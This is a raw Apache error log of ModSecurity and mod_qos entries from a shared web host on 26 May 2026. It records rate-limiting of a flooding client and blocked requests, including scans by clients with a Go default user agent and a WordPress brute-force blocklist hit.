[Tue May 26 20:00:41.458199 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lDAAAAOk"]
[Tue May 26 20:00:41.575353 2026] [security2:error] [pid 106517:tid 106662] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lKAAAAJE"]
[Tue May 26 20:00:41.580520 2026] [http2:info] [pid 112029:tid 112029] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 20:00:41.777426 2026] [security2:error] [pid 106517:tid 106755] [client 103.163.220.29:44105] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/bolt.php"] [unique_id "ahWukYZZc2DoU1lPnP1liAAAAO0"]
[Tue May 26 20:00:41.837492 2026] [qos:error] [pid 112029:tid 112195] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukaFW0C-ajaCsyFc6YgAAAS4
[Tue May 26 20:00:41.839305 2026] [qos:error] [pid 112029:tid 112202] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukaFW0C-ajaCsyFc6ZAAAATU
[Tue May 26 20:00:41.839676 2026] [qos:error] [pid 112029:tid 112216] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukaFW0C-ajaCsyFc6YwAAAUM
[Tue May 26 20:00:41.840487 2026] [qos:error] [pid 112029:tid 112220] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukaFW0C-ajaCsyFc6ZgAAAUc
[Tue May 26 20:00:41.840496 2026] [qos:error] [pid 112029:tid 112217] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukaFW0C-ajaCsyFc6aAAAAUQ
[Tue May 26 20:00:41.995581 2026] [qos:error] [pid 106517:tid 106695] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukYZZc2DoU1lPnP1lnAAAALE
[Tue May 26 20:00:42.004182 2026] [qos:error] [pid 112029:tid 112263] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukqFW0C-ajaCsyFc6bwAAAXI
[Tue May 26 20:00:42.004791 2026] [qos:error] [pid 112029:tid 112264] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukqFW0C-ajaCsyFc6cAAAAXM
[Tue May 26 20:00:42.008756 2026] [qos:error] [pid 112029:tid 112229] [client 45.148.10.120:46514] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6cwAAAVA
[Tue May 26 20:00:42.009531 2026] [qos:error] [pid 112029:tid 112230] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6dAAAAVE
[Tue May 26 20:00:42.016011 2026] [qos:error] [pid 112029:tid 112232] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6dQAAAVM
[Tue May 26 20:00:42.020412 2026] [qos:error] [pid 112029:tid 112241] [client 45.148.10.120:46530] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6dgAAAVw
[Tue May 26 20:00:42.028550 2026] [qos:error] [pid 112029:tid 112242] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6dwAAAV0
[Tue May 26 20:00:42.042123 2026] [qos:error] [pid 112029:tid 112228] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6eAAAAU8
[Tue May 26 20:00:42.047273 2026] [qos:error] [pid 112029:tid 112239] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukqFW0C-ajaCsyFc6eQAAAVo
[Tue May 26 20:00:42.266290 2026] [security2:error] [pid 106517:tid 106683] [client 103.163.220.49:61761] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/comments-pagination-numbers/"] [unique_id "ahWukoZZc2DoU1lPnP1lpQAAAKU"]
[Tue May 26 20:00:42.274784 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k6gAAAOM"]
[Tue May 26 20:00:42.275647 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lDgAAAP0"]
[Tue May 26 20:00:42.276250 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k7QAAAQQ"]
[Tue May 26 20:00:42.276441 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1k_AAAAMc"]
[Tue May 26 20:00:42.277838 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lBQAAAPg"]
[Tue May 26 20:00:42.288019 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lOwAAAMQ"]
[Tue May 26 20:00:42.308270 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lCAAAAIY"]
[Tue May 26 20:00:42.311299 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lRwAAALo"]
[Tue May 26 20:00:42.325271 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lQgAAALs"]
[Tue May 26 20:00:42.325427 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lRQAAAKA"]
[Tue May 26 20:00:42.329337 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lFAAAAMk"]
[Tue May 26 20:00:42.335699 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lTAAAAPE"]
[Tue May 26 20:00:42.339666 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lUgAAAP8"]
[Tue May 26 20:00:42.340333 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lEgAAAJM"]
[Tue May 26 20:00:42.341170 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lVAAAAMs"]
[Tue May 26 20:00:42.345424 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lSwAAAKw"]
[Tue May 26 20:00:42.357657 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lZgAAAMg"]
[Tue May 26 20:00:42.358408 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lSQAAALI"]
[Tue May 26 20:00:42.372864 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lXAAAALY"]
[Tue May 26 20:00:42.373235 2026] [security2:error] [pid 112029:tid 112167] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6MgAAARI"]
[Tue May 26 20:00:42.374554 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1ldAAAALk"]
[Tue May 26 20:00:42.385345 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lZQAAAMo"]
[Tue May 26 20:00:42.386214 2026] [security2:error] [pid 112029:tid 112160] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6KwAAAQs"]
[Tue May 26 20:00:42.388791 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukIZZc2DoU1lPnP1lEwAAAJo"]
[Tue May 26 20:00:42.390157 2026] [security2:error] [pid 112029:tid 112177] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6OgAAARw"]
[Tue May 26 20:00:42.394336 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1lVQAAALM"]
[Tue May 26 20:00:42.401763 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1laAAAAI0"]
[Tue May 26 20:00:42.418478 2026] [security2:error] [pid 112029:tid 112182] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6QAAAASE"]
[Tue May 26 20:00:42.423734 2026] [security2:error] [pid 112029:tid 112186] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6RQAAASU"]
[Tue May 26 20:00:42.439539 2026] [security2:error] [pid 112029:tid 112030] [remote 111.229.10.83:42084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWukqFW0C-ajaCsyFc6fAABfAA"]
[Tue May 26 20:00:42.440220 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukYZZc2DoU1lPnP1laQAAANs"]
[Tue May 26 20:00:42.460094 2026] [security2:error] [pid 112029:tid 112165] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6MQAAARA"]
[Tue May 26 20:00:42.767102 2026] [security2:error] [pid 106517:tid 106701] [client 103.163.220.13:55875] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/login.php"] [unique_id "ahWukoZZc2DoU1lPnP1lxQAAALc"]
[Tue May 26 20:00:42.809571 2026] [qos:error] [pid 112029:tid 112256] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukqFW0C-ajaCsyFc6nwAAAWs
[Tue May 26 20:00:42.811369 2026] [qos:error] [pid 112029:tid 112262] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukqFW0C-ajaCsyFc6oQAAAXE
[Tue May 26 20:00:42.813099 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukoZZc2DoU1lPnP1mEAAAAMs
[Tue May 26 20:00:42.813262 2026] [qos:error] [pid 106517:tid 106765] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukoZZc2DoU1lPnP1mDwAAAPc
[Tue May 26 20:00:42.814450 2026] [qos:error] [pid 106517:tid 106756] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mFQAAAO4
[Tue May 26 20:00:42.817710 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mGAAAAMw
[Tue May 26 20:00:42.820203 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46434] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mFAAAAL0
[Tue May 26 20:00:42.821171 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukoZZc2DoU1lPnP1mGgAAAM4
[Tue May 26 20:00:42.823967 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWukoZZc2DoU1lPnP1mGwAAAMs
[Tue May 26 20:00:42.824012 2026] [qos:error] [pid 106517:tid 106729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWukoZZc2DoU1lPnP1mHAAAANM
[Tue May 26 20:00:42.966125 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mJgAAAQQ
[Tue May 26 20:00:42.967338 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:46350] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mKAAAAKs
[Tue May 26 20:00:42.971937 2026] [qos:error] [pid 106517:tid 106766] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mKQAAAPg
[Tue May 26 20:00:42.972374 2026] [qos:error] [pid 106517:tid 106664] [client 45.148.10.120:46434] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mKgAAAJM
[Tue May 26 20:00:42.972431 2026] [qos:error] [pid 112029:tid 112239] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWukqFW0C-ajaCsyFc6pgAAAVo
[Tue May 26 20:00:42.982214 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mLAAAAKo
[Tue May 26 20:00:42.987896 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mLQAAANs
[Tue May 26 20:00:42.990198 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:46362] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWukoZZc2DoU1lPnP1mLgAAAP8
[Tue May 26 20:00:43.025531 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mLwAAAKk
[Tue May 26 20:00:43.066272 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:46454] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mMgAAAKQ
[Tue May 26 20:00:43.116611 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46350] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mMwAAAL0
[Tue May 26 20:00:43.119133 2026] [qos:error] [pid 106517:tid 106744] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mNAAAAOI
[Tue May 26 20:00:43.120894 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:53590] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mNQAAAM4
[Tue May 26 20:00:43.128417 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mNgAAAJQ
[Tue May 26 20:00:43.129128 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:46434] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mNwAAAMc
[Tue May 26 20:00:43.133857 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mOAAAAMs
[Tue May 26 20:00:43.139886 2026] [qos:error] [pid 106517:tid 106656] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mOQAAAIs
[Tue May 26 20:00:43.145256 2026] [qos:error] [pid 106517:tid 106766] [client 45.148.10.120:46362] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mOgAAAPg
[Tue May 26 20:00:43.174304 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mOwAAALQ
[Tue May 26 20:00:43.226575 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:46454] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mQgAAAKk
[Tue May 26 20:00:43.265710 2026] [qos:error] [pid 106517:tid 106653] [client 45.148.10.120:46350] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mRAAAAIg
[Tue May 26 20:00:43.269614 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:53590] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mRQAAAMw
[Tue May 26 20:00:43.271892 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mRgAAAKQ
[Tue May 26 20:00:43.278878 2026] [security2:error] [pid 112029:tid 112184] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6RgAAASM"]
[Tue May 26 20:00:43.280353 2026] [security2:error] [pid 112029:tid 112211] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6VgAAAT4"]
[Tue May 26 20:00:43.290767 2026] [security2:error] [pid 112029:tid 112180] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6RAAAAR8"]
[Tue May 26 20:00:43.291004 2026] [security2:error] [pid 112029:tid 112188] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6SAAAASc"]
